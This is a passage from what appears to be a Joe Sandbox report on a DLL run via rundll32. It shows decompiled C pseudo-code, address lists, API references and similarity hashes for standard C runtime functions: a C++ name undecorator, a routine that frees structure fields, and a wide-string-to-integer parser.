							_t187 = E10009F87( &_v32);
							_t213 =  *_t187;
							_t229 = _t187[1];
							_v16 = _t213;
							_v12 = _t229;
							__eflags = _t213;
							if(_t213 != 0) {
								goto L27;
							}
							goto L59;
						}
						if(__eflags == 0) {
							_v32 = "char16_t";
							goto L42;
						}
						_t188 = _t181 - 0x4f;
						__eflags = _t188;
						if(_t188 == 0) {
							_t210 = 0xfffffffe;
							goto L65;
						}
						_t189 = _t188 - _t232;
						__eflags = _t189;
						if(_t189 == 0) {
							_v32 = "char8_t";
							goto L37;
						}
						__eflags = _t189 != 1;
						if(_t189 != 1) {
							goto L60;
						}
						_v32 = "<unknown>";
						_v28 = 9;
						goto L26;
					}
					if(__eflags == 0) {
						_v32 = "bool";
						_v28 = 4;
						goto L26;
					}
					__eflags = _t181 - 0x47;
					if(_t181 > 0x47) {
						__eflags = _t181 - 0x49;
						if(_t181 <= 0x49) {
							_v32 = "__int32";
							goto L37;
						}
						__eflags = _t181 - 0x4b;
						if(_t181 <= 0x4b) {
							_v32 = "__int64";
							goto L37;
						}
						__eflags = _t181 - 0x4d;
						if(_t181 > 0x4d) {
							goto L60;
						}
						_v32 = "__int128";
						goto L42;
					}
					__eflags = _t181 - 0x46;
					if(_t181 >= 0x46) {
						_v32 = "__int16";
						goto L37;
					}
					__eflags = _t181;
					if(_t181 == 0) {
						_t213 =  &_v16;
						 *0x1004e004 = _t228;
						E10007596( &_v16, 1);
						goto L27;
					}
					__eflags = _t181 - 0x24;
					if(_t181 == 0x24) {
						_v32 = "__w64 ";
						_v28 = 6;
						E10007615(_t226, _a4,  &_v32, E10008D42( &_v24, _a8));
						goto L93;
					}
					__eflags = _t181 + 0xffffffbc - 1;
					if(_t181 + 0xffffffbc > 1) {
						goto L60;
					} else {
						_v32 = "__int8";
						_v28 = 6;
						goto L26;
					}
				}
				if(_t244 == 0) {
					goto L79;
				}
				_t6 = _t203 - 0x43; // -67
				_t197 = _t6;
				if(_t197 > 0xa) {
					goto L76;
				}
				_t7 = _t197 + 0x1000922a; // 0x8bffffe5
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M10009212))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t213 =  &_v16;
						E10007500( &_v16,  &_v32);
						goto L80;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						goto L76;
				}
			}

0x10008d45
0x10008d4d
0x10008d53
0x10009202
0x1000920a
0x1000920a
0x1000920d
0x10009210
0x10009210
0x10008d59
0x10008d5d
0x10008d5d
0x10008d60
0x10008d64
0x10008d67
0x10008d6f
0x10008d70
0x10008d73
0x10008e00
0x10008e03
0x10009133
0x1000913e
0x10009145
0x1000914a
0x1000914d
0x10009155
0x10009158
0x1000915f
0x10009164
0x10009164
0x10009166
0x10009169
0x10009195
0x1000919c
0x100091a3
0x100091b7
0x100091b9
0x100091c1
0x100091c7
0x100091ca
0x100091ca
0x100091d0
0x100091e5
0x100091e5
0x100091ea
0x100091f0
0x100091f5
0x00000000
0x100091f5
0x1000916b
0x1000916d
0x10008eae
0x10008eae
0x10008eb5
0x00000000
0x10008eb5
0x10009173
0x10009175
0x00000000
0x00000000
0x1000917b
0x1000917d
0x00000000
0x00000000
0x10009183
0x10009185
0x00000000
0x00000000
0x1000918e
0x00000000
0x00000000
0x10008e92
0x10008e95
0x10008e98
0x00000000
0x00000000
0x10008e9a
0x10008e9c
0x00000000
0x00000000
0x10008e9e
0x10008ea0
0x00000000
0x00000000
0x10008ea2
0x10008ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x10008ea4
0x10008e09
0x1000910a
0x1000910d
0x10009116
0x1000911c
0x1000911e
0x10009121
0x10009124
0x10009127
0x10009129
0x00000000
0x00000000
0x10008fdc
0x10008fdc
0x10008fdf
0x10008fe1
0x00000000
0x10008fe1
0x10008e0f
0x10008e12
0x10009020
0x10009020
0x10009023
0x10009023
0x10009026
0x1000902a
0x1000902e
0x10009030
0x10009033
0x10009036
0x10009039
0x1000903c
0x1000908a
0x1000908c
0x10009090
0x10009093
0x10009096
0x100090d2
0x100090d4
0x100090d9
0x100090e4
0x100090eb
0x100090eb
0x10009098
0x1000909b
0x100090a6
0x100090ad
0x100090b2
0x100090b4
0x100090b9
0x100090c4
0x100090cb
0x100090cb
0x100090b4
0x10009096
0x100090fd
0x00000000
0x10009102
0x10009045
0x10009056
0x1000905b
0x10009061
0x10009063
0x10009068
0x10009073
0x1000907a
0x1000907f
0x1000907f
0x10009082
0x00000000
0x10009082
0x10008e18
0x10008e1b
0x1000900d
0x10009014
0x10008def
0x10008df3
0x10008df6
0x00000000
0x10008df6
0x10008e21
0x10008e24
0x00000000
0x00000000
0x10008e2a
0x10008e2c
0x10008e2c
0x10008e2f
0x10008e32
0x10008e35
0x10008e3b
0x10008e3e
0x10008f60
0x10008f63
0x10008fa5
0x10008fa8
0x10009001
0x10008f2f
0x10008f2f
0x10008e83
0x10008e87
0x10008e8a
0x10008e8f
0x10008e8f
0x00000000
0x10008e8f
0x10008faa
0x10008fad
0x10008ff5
0x10008f09
0x10008f09
0x00000000
0x10008f09
0x10008fb2
0x10008fb5
0x10008fe9
0x10008fe9
0x00000000
0x10008fe9
0x10008fb7
0x10008fba
0x10008fc3
0x10008fc9
0x10008fcb
0x10008fce
0x10008fd1
0x10008fd4
0x10008fd6
0x00000000
0x00000000
0x00000000
0x10008fd6
0x10008f65
0x10008f9c
0x00000000
0x10008f9c
0x10008f67
0x10008f67
0x10008f6a
0x10008f96
0x00000000
0x10008f96
0x10008f6c
0x10008f6c
0x10008f6e
0x10008f88
0x00000000
0x10008f88
0x10008f70
0x10008f73
0x00000000
0x00000000
0x10008f75
0x10008f7c
0x00000000
0x10008f7c
0x10008e44
0x10008f4d
0x10008f54
0x00000000
0x10008f54
0x10008e4a
0x10008e4d
0x10008f15
0x10008f18
0x10008f44
0x00000000
0x10008f44
0x10008f1a
0x10008f1d
0x10008f3b
0x00000000
0x10008f3b
0x10008f1f
0x10008f22
0x00000000
0x00000000
0x10008f28
0x00000000
0x10008f28
0x10008e53
0x10008e56
0x10008f02
0x00000000
0x10008f02
0x10008e5c
0x10008e5e
0x10008ef2
0x10008ef5
0x10008efb
0x00000000
0x10008efb
0x10008e64
0x10008e67
0x10008ec7
0x10008ecf
0x10008ee3
0x00000000
0x10008ee8
0x10008e6c
0x10008e6f
0x00000000
0x10008e75
0x10008e75
0x10008e7c
0x00000000
0x10008e7c
0x10008e6f
0x10008d79
0x00000000
0x00000000
0x10008d7f
0x10008d7f
0x10008d85
0x00000000
0x00000000
0x10008d8b
0x10008d92
0x00000000
0x10008d99
0x00000000
0x00000000
0x10008db8
0x10008dbf
0x00000000
0x00000000
0x10008dc8
0x10008dcf
0x00000000
0x00000000
0x10008dd8
0x10008da0
0x10008da0
0x10008da7
0x10008dab
0x10008dae
0x00000000
0x00000000
0x10008de1
0x10008de8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

shared_ptr.LIBCMT ref: 10008DAE
shared_ptr.LIBCMT ref: 10008DF6
shared_ptr.LIBCMT ref: 10008E8A
operator+.LIBVCRUNTIME ref: 10008EE3
DName::operator=.LIBVCRUNTIME ref: 10008EFB
shared_ptr.LIBCMT ref: 10009145
DName::operator+.LIBCMT ref: 100091B9
operator+.LIBVCRUNTIME ref: 10009202

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: 3f0597f9030ab65205f9ced627fb8c410918e4c165c87269fa6c19fcfb40e6f4
Instruction ID: b28e2a1fd94149dd2561a11b9f82f89739496a4781773dc4ca3130be31d5303b
Opcode Fuzzy Hash: 3f0597f9030ab65205f9ced627fb8c410918e4c165c87269fa6c19fcfb40e6f4
Instruction Fuzzy Hash: 1CD18FB1D0424BDFEB00CF90C885AEEBBB4FB04380F60816AD955A7289D7799B45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1000C2ED, Relevance: 15.2, APIs: 10, Instructions: 250
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E1000C2ED(void* __edx, signed int* _a4) {
				signed int _v8;
				long _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				intOrPtr* _t63;
				char* _t64;
				signed int _t72;
				signed int _t78;
				signed int _t84;
				signed int _t85;
				signed int _t89;
				signed int _t124;
				signed int _t126;
				void* _t129;
				signed int* _t164;
				signed int _t165;
				signed int _t166;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				void* _t176;

				_t163 = __edx;
				_t61 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t61 ^ _t173;
				_t63 =  *0x1004e004; // 0x0
				_t124 =  *_t63;
				_t64 = _t63 + 1;
				_t164 = _a4;
				_t165 = _t124;
				 *0x1004e004 = _t64;
				_v28 = _t165;
				_t176 = _t124 - 0x45;
				if(_t176 > 0) {
					__eflags = _t124 - 0x52;
					if(__eflags > 0) {
						__eflags = _t124 - 0x53;
						if(_t124 == 0x53) {
							 *_t164 =  *_t164 & 0x00000000;
							_t58 =  &(_t164[1]);
							 *_t58 = _t164[1] & 0x00000000;
							__eflags =  *_t58;
							L53:
							return E100037EA(_t164, _v8 ^ _t173, _t163);
						}
						__eflags = _t124 - 0x54 - 2;
						if(_t124 - 0x54 > 2) {
							L51:
							_t164[1] = _t164[1] & 0x00000000;
							 *_t164 =  *_t164 & 0x00000000;
							_t164[1] = 2;
							goto L53;
						}
						L38:
						E1000BC98(_t163,  &_v40);
						E1000BD27( &_v40,  &_v24, 0x10);
						_t72 = E10010036( &_v40,  &_v24);
						__eflags =  *0x1004e00c & 0x00004000;
						_t166 = _t72;
						if(( *0x1004e00c & 0x00004000) == 0) {
							L42:
							swprintf( &_v24, 0x10, "%d", _t166 & 0x00000fff);
							_v36 = 0;
							_push(_v36);
							E10006DC1( &_v40,  &_v24);
							_t78 = _v28 - 0x52;
							__eflags = _t78;
							if(_t78 == 0) {
								L50:
								_v32 = "`template-type-parameter-";
								L49:
								_v28 = 0x19;
								L47:
								E100076A6(E1000723E( &_v48,  &_v32),  &_v32,  &_v40);
								_push(0x27);
								L35:
								_push(_t164);
								E100076C8( &_v32);
								goto L53;
							}
							_t84 = _t78;
							__eflags = _t84;
							if(_t84 == 0) {
								goto L50;
							}
							_t85 = _t84 - 1;
							__eflags = _t85;
							if(_t85 == 0) {
								_v32 = "`generic-class-parameter-";
								goto L49;
							}
							__eflags = _t85 != 1;
							if(_t85 != 1) {
								goto L51;
							}
							_v32 = "`generic-method-parameter-";
							_v28 = 0x1a;
							goto L47;
						}
						_t126 =  *0x1004e014; // 0x0
						__eflags = _t126;
						if(_t126 == 0) {
							goto L42;
						}
						 *0x1004223c(_t72 & 0x00000fff);
						_t89 =  *_t126();
						__eflags = _t89;
						if(_t89 == 0) {
							goto L42;
						}
						_v36 = 0;
						_push(_v36);
						E10006E34(_t164, _t89);
						goto L53;
					}
					if(__eflags == 0) {
						goto L38;
					}
					__eflags = _t124 - 0x4a;
					if(_t124 <= 0x4a) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E10008798( &_v32, 0x7b);
						_t127 = _t124 - 0x48;
						__eflags = _t124 - 0x48 - 2;
						if(__eflags <= 0) {
							_push( &_v40);
							E100077A0( &_v32, L10009B9E(_t127,  &_v32, __edx, _t164, _t165, __eflags));
							E100077F7( &_v32, 0x2c);
						}
						_t168 = _t165 - 0x46;
						__eflags = _t168;
						if(_t168 == 0) {
							L32:
							E100077A0( &_v32, E1000BC98(_t163,  &_v40));
							E100077F7( &_v32, 0x2c);
							goto L33;
						} else {
							_t169 = _t168 - 1;
							__eflags = _t169;
							if(_t169 == 0) {
								L31:
								E100077A0( &_v32, E1000BC98(_t163,  &_v40));
								E100077F7( &_v32, 0x2c);
								goto L32;
							}
							_t170 = _t169 - 1;
							__eflags = _t170;
							if(_t170 == 0) {
								L33:
								E100077A0( &_v32, E1000BC98(_t163,  &_v40));
								L34:
								_push(0x7d);
								goto L35;
							}
							_t171 = _t170 - 1;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L32;
							}
							__eflags = _t171 != 1;
							if(_t171 != 1) {
								goto L34;
							}
							goto L31;
						}
					}
					__eflags = _t124 - 0x4d;
					if(_t124 != 0x4d) {
						goto L51;
					}
					E1000C5F3(_t124, __edx, _t165,  &_v32);
					E1000C2ED(__edx, _t164);
					L9:
					L10:
					goto L53;
				}
				if(_t176 == 0) {
					_push(_t164);
					L10009B9E(_t124, _t129, __edx, _t164, _t165, __eflags);
					goto L10;
				}
				if(_t124 == 0) {
					 *0x1004e004 = _t64 - 1;
					E100072DE(_t164, 1);
					goto L53;
				}
				if(_t124 == 0x30) {
					E1000BC98(__edx, _t164);
					goto L10;
				}
				if(_t124 == 0x31) {
					__eflags =  *_t64 - 0x40;
					if( *_t64 != 0x40) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E10008798( &_v32, 0x26);
						_push( &_v40);
						E100076A6( &_v32, _t164, L10009B9E(_t124,  &_v32, __edx, _t164, _t165, __eflags));
					} else {
						_v32 = "NULL";
						 *0x1004e004 = _t64 + 1;
						_v28 = 4;
						E1000723E(_t164,  &_v32);
					}
					goto L53;
				}
				if(_t124 == 0x32) {
					E1000CC65(_t124, __edx, _t165, _t164);
					goto L10;
				}
				if(_t124 == 0x34) {
					E1000BF31(_t164);
					goto L10;
				}
				if(_t124 - 0x41 > 1) {
					goto L51;
				}
				E1000A460(__edx, _t164, _t165);
				goto L9;
			}

0x1000c2ed
0x1000c2f3
0x1000c2fa
0x1000c2fd
0x1000c305
0x1000c307
0x1000c308
0x1000c30b
0x1000c30e
0x1000c313
0x1000c316
0x1000c319
0x1000c3ea
0x1000c3ed
0x1000c4c8
0x1000c4cb
0x1000c5db
0x1000c5de
0x1000c5de
0x1000c5de
0x1000c5e2
0x1000c5f2
0x1000c5f2
0x1000c4d4
0x1000c4d7
0x1000c5ce
0x1000c5ce
0x1000c5d2
0x1000c5d5
0x00000000
0x1000c5d5
0x1000c4dd
0x1000c4e1
0x1000c4f0
0x1000c4f9
0x1000c4fe
0x1000c508
0x1000c50b
0x1000c540
0x1000c552
0x1000c55a
0x1000c564
0x1000c568
0x1000c570
0x1000c570
0x1000c573
0x1000c5c5
0x1000c5c5
0x1000c5bc
0x1000c5bc
0x1000c593
0x1000c5a9
0x1000c5ae
0x1000c4ba
0x1000c4ba
0x1000c4be
0x00000000
0x1000c4be
0x1000c576
0x1000c576
0x1000c579
0x00000000
0x00000000
0x1000c57b
0x1000c57b
0x1000c57e
0x1000c5b5
0x00000000
0x1000c5b5
0x1000c580
0x1000c583
0x00000000
0x00000000
0x1000c585
0x1000c58c
0x00000000
0x1000c58c
0x1000c50d
0x1000c513
0x1000c515
0x00000000
0x00000000
0x1000c51f
0x1000c525
0x1000c528
0x1000c52a
0x00000000
0x00000000
0x1000c52c
0x1000c532
0x1000c536
0x00000000
0x1000c536
0x1000c3f3
0x00000000
0x00000000
0x1000c3f9
0x1000c3fc
0x1000c41b
0x1000c422
0x1000c428
0x1000c42d
0x1000c430
0x1000c433
0x1000c438
0x1000c443
0x1000c44d
0x1000c44d
0x1000c452
0x1000c452
0x1000c455
0x1000c488
0x1000c496
0x1000c4a0
0x00000000
0x1000c457
0x1000c457
0x1000c457
0x1000c45a
0x1000c46b
0x1000c479
0x1000c483
0x00000000
0x1000c483
0x1000c45c
0x1000c45c
0x1000c45f
0x1000c4a5
0x1000c4b3
0x1000c4b8
0x1000c4b8
0x00000000
0x1000c4b8
0x1000c461
0x1000c461
0x1000c464
0x00000000
0x00000000
0x1000c466
0x1000c469
0x00000000
0x00000000
0x00000000
0x1000c469
0x1000c455
0x1000c3fe
0x1000c401
0x00000000
0x00000000
0x1000c40b
0x1000c411
0x1000c358
0x1000c359
0x00000000
0x1000c359
0x1000c31f
0x1000c3df
0x1000c3e0
0x00000000
0x1000c3e0
0x1000c327
0x1000c3d0
0x1000c3d5
0x00000000
0x1000c3d5
0x1000c330
0x1000c3c4
0x00000000
0x1000c3c4
0x1000c339
0x1000c36f
0x1000c372
0x1000c398
0x1000c39f
0x1000c3a5
0x1000c3ad
0x1000c3b9
0x1000c374
0x1000c375
0x1000c37c
0x1000c386
0x1000c38e
0x1000c38e
0x00000000
0x1000c372
0x1000c33e
0x1000c368
0x00000000
0x1000c368
0x1000c343
0x1000c360
0x00000000
0x1000c360
0x1000c34b
0x00000000
0x00000000
0x1000c353
0x00000000

APIs

DName::operator+.LIBCMT ref: 1000C3B9
UnDecorator::getSignedDimension.LIBCMT ref: 1000C3C4
DName::DName.LIBVCRUNTIME ref: 1000C3D5
UnDecorator::getSignedDimension.LIBCMT ref: 1000C46F
UnDecorator::getSignedDimension.LIBCMT ref: 1000C48C
UnDecorator::getSignedDimension.LIBCMT ref: 1000C4A9
DName::operator+.LIBCMT ref: 1000C4BE
UnDecorator::getSignedDimension.LIBCMT ref: 1000C4E1
swprintf.LIBCMT ref: 1000C552
DName::operator+.LIBCMT ref: 1000C5A9

Part of subcall function 1000A460: DName::DName.LIBVCRUNTIME ref: 1000A484

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
Opcode ID: 3870ca652ee5dd46192f954932dcdd9a1671f71589c666b9744f5de558d7014f
Instruction ID: f9c83e7f69799ed626e93f8569c8994f1034e48759f8977a8353ac719b3bb837
Opcode Fuzzy Hash: 3870ca652ee5dd46192f954932dcdd9a1671f71589c666b9744f5de558d7014f
Instruction Fuzzy Hash: 62819376D1070D9AFB14CBA0CD96FFE77B8EB053C1F60401AE506A2089DB78BA44C795

Uniqueness

Uniqueness Score: -1.00%

Function 10023CFC, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E10023CFC(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x100439f8;
				if(_t67 != 0x100439f8) {
					E100268B3(_t67);
					_t36 = _a4;
				}
				E100268B3( *((intOrPtr*)(_t36 + 0x3c)));
				E100268B3( *((intOrPtr*)(_a4 + 0x30)));
				E100268B3( *((intOrPtr*)(_a4 + 0x34)));
				E100268B3( *((intOrPtr*)(_a4 + 0x38)));
				E100268B3( *((intOrPtr*)(_a4 + 0x28)));
				E100268B3( *((intOrPtr*)(_a4 + 0x2c)));
				E100268B3( *((intOrPtr*)(_a4 + 0x40)));
				E100268B3( *((intOrPtr*)(_a4 + 0x44)));
				E100268B3( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E100238C6(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E10023931(_t71, _t75);
			}

0x10023cfc
0x10023d01
0x10023d07
0x10023d09
0x10023d0f
0x10023d12
0x10023d17
0x10023d1a
0x10023d1e
0x10023d29
0x10023d34
0x10023d3f
0x10023d4a
0x10023d55
0x10023d60
0x10023d6b
0x10023d79
0x10023d84
0x10023d8c
0x10023d8d
0x10023d90
0x10023d96
0x10023d9a
0x10023d9e
0x10023d9f
0x10023da9
0x10023daf
0x10023db0
0x10023db3
0x10023db9
0x10023dbd
0x10023dc1
0x10023dc8

APIs

_free.LIBCMT ref: 10023D12

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 10023D1E
_free.LIBCMT ref: 10023D29
_free.LIBCMT ref: 10023D34
_free.LIBCMT ref: 10023D3F
_free.LIBCMT ref: 10023D4A
_free.LIBCMT ref: 10023D55
_free.LIBCMT ref: 10023D60
_free.LIBCMT ref: 10023D6B
_free.LIBCMT ref: 10023D79

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 46643b81a24f0458ed114faaef335da02fc76548a0a77645ebc19370622f552b
Instruction ID: 02d10424f483025c11247d9988229feb7d6f071447483585f46ce33aa515a283
Opcode Fuzzy Hash: 46643b81a24f0458ed114faaef335da02fc76548a0a77645ebc19370622f552b
Instruction Fuzzy Hash: 0A21947AD04108AFDB41DFA4D981DDE7BB9EF08244F4086A6F515DB222DB71EA448FC0

Uniqueness

Uniqueness Score: -1.00%

Function 1000EFDF, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1000EFDF(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed short* _v156;
				signed short* _v160;
				signed int _v164;
				intOrPtr _v168;
				signed short* _v172;
				char _v176;
				char _v188;
				signed short* _t176;
				signed int _t177;
				signed int _t178;
				signed short* _t179;
				signed int _t180;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				void* _t187;
				signed char _t189;
				signed int _t193;
				signed int _t194;
				signed int _t196;
				void* _t199;
				intOrPtr _t200;
				signed int _t208;
				signed int _t209;
				signed short* _t211;
				signed int _t212;
				signed int _t214;
				intOrPtr _t219;
				void* _t220;
				signed short* _t221;
				signed int _t222;
				signed short* _t223;
				intOrPtr _t224;
				void* _t228;
				signed short* _t230;
				signed int _t232;
				signed short* _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed short* _t240;
				intOrPtr* _t244;
				signed short _t245;

				if(E1000FB5A( &_a8) == 0) {
					L5:
					_t235 = 0;
					_t208 = 0;
					L6:
					_t244 = _a12;
					if(_t244 != 0) {
						 *_t244 = _a8;
					}
					return _t235;
				}
				_t209 = _a16;
				_t236 = 2;
				if(_t209 == 0) {
					L9:
					_t217 =  &_v188;
					E1000F794( &_v188, _t228, _a4);
					_v12 = 0;
					_v20 = 0;
					_t176 = _a8;
					_v172 = _t176;
					_t245 =  *_t176 & 0x0000ffff;
					_t177 =  &(_t176[1]);
					L11:
					_a8 = _t177;
					_t178 = E100242A0(_t217, _t245, 8);
					_pop(_t217);
					__eflags = _t178;
					if(_t178 != 0) {
						_t179 = _a8;
						_t245 =  *_t179 & 0x0000ffff;
						_t177 = _t179 + _t236;
						__eflags = _t177;
						goto L11;
					}
					_t180 = _a20 & 0x000000ff;
					_v8 = _t180;
					__eflags = _t245 - 0x2d;
					if(_t245 != 0x2d) {
						__eflags = _t245 - 0x2b;
						if(_t245 != 0x2b) {
							_t230 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v8 = _t180 | _t236;
						L15:
						_t234 = _a8;
						_t245 =  *_t234 & 0x0000ffff;
						_t230 = _t234 + _t236;
						_a8 = _t230;
						L17:
						_v16 = 0x3a;
						_t219 = 0xff10;
						_v148 = 0x66a;
						_v24 = 0x6f0;
						_v28 = 0x6fa;
						_v32 = 0x966;
						_v36 = 0x970;
						_v40 = 0x9e6;
						_v44 = 0x9f0;
						_v48 = 0xa66;
						_v52 = 0xa70;
						_v56 = 0xae6;
						_v60 = 0xaf0;
						_v64 = 0xb66;
						_v68 = 0xb70;
						_v72 = 0xc66;
						_v76 = 0xc70;
						_v80 = 0xce6;
						_v84 = 0xcf0;
						_v88 = 0xd66;
						_v92 = 0xd70;
						_v96 = 0xe50;
						_v100 = 0xe5a;
						_v104 = 0xed0;
						_v108 = 0xeda;
						_v112 = 0xf20;
						_v116 = 0xf2a;
						_v120 = 0x1040;
						_v124 = 0x104a;
						_v128 = 0x17e0;
						_v132 = 0x17ea;
						_v136 = 0x1810;
						_v140 = 0x181a;
						_v144 = 0xff1a;
						_t237 = 0x30;
						__eflags = _t209;
						if(_t209 == 0) {
							L19:
							__eflags = _t245 - _t237;
							if(_t245 < _t237) {
								L61:
								_t182 = _t245 & 0x0000ffff;
								__eflags = _t182 - 0x41;
								if(_t182 < 0x41) {
									L64:
									_t86 = _t182 - 0x61; // 0x5ff
									_t220 = _t86;
									__eflags = _t220 - 0x19;
									if(_t220 > 0x19) {
										_t183 = _t182 | 0xffffffff;
										__eflags = _t183;
										L69:
										__eflags = _t183;
										if(_t183 == 0) {
											_t184 =  *_t230 & 0x0000ffff;
											_t221 =  &(_t230[1]);
											_a8 = _t221;
											__eflags = _t184 - 0x78;
											if(_t184 == 0x78) {
												L77:
												__eflags = _t209;
												if(_t209 == 0) {
													_t209 = 0x10;
													_a16 = _t209;
												}
												_t245 =  *_t221 & 0x0000ffff;
												_t222 =  &(_t221[1]);
												__eflags = _t222;
												_a8 = _t222;
												L80:
												_t185 = _t209;
												asm("cdq");
												_push(_t209);
												_t223 = _t230;
												_v164 = _t209;
												_v160 = _t223;
												_t186 = E1003F7B0(0xffffffff, 0xffffffff, _t185, _t223);
												_v152 = _t209;
												_v156 = _t223;
												_t211 = _t230;
												_t224 = _t186;
												_v16 = _t211;
												_v168 = _t224;
												while(1) {
													__eflags = _t245 - _t237;
													if(_t245 < _t237) {
														goto L122;
													}
													_t199 = 0x3a;
													__eflags = _t245 - _t199;
													if(_t245 >= _t199) {
														_t200 = 0xff10;
														__eflags = _t245 - 0xff10;
														if(_t245 >= 0xff10) {
															__eflags = _t245 - _v144;
															if(_t245 < _v144) {
																L87:
																_t239 = (_t245 & 0x0000ffff) - _t200;
																L121:
																__eflags = _t239 - 0xffffffff;
																if(_t239 != 0xffffffff) {
																	L130:
																	__eflags = _t239 - 0xffffffff;
																	if(_t239 == 0xffffffff) {
																		L144:
																		E1000FB11( &_a8, _t245);
																		_t189 = _v8;
																		__eflags = _t189 & 0x00000008;
																		if((_t189 & 0x00000008) != 0) {
																			_t208 = _v20;
																			_t235 = _v12;
																			__eflags = E1000E497(_t189, _t235, _t208);
																			if(__eflags == 0) {
																				__eflags = _v8 & 0x00000002;
																				if((_v8 & 0x00000002) != 0) {
																					_t235 =  ~_t235;
																					asm("adc ebx, 0x0");
																					_t208 =  ~_t208;
																				}
																				L155:
																				__eflags = _v176;
																				if(_v176 != 0) {
																					 *(_v188 + 0x350) =  *(_v188 + 0x350) & 0xfffffffd;
																				}
																				goto L6;
																			}
																			 *((intOrPtr*)(E1002449E(__eflags))) = 0x22;
																			_t193 = _v8;
																			__eflags = _t193 & 0x00000001;
																			if((_t193 & 0x00000001) != 0) {
																				__eflags = _t193 & 0x00000002;
																				if((_t193 & 0x00000002) == 0) {
																					_t194 = _t193 | 0xffffffff;
																					__eflags = _t194;
																					_t208 = 0x7fffffff;
																				} else {
																					_t194 = 0;
																					_t208 = 0x80000000;
																				}
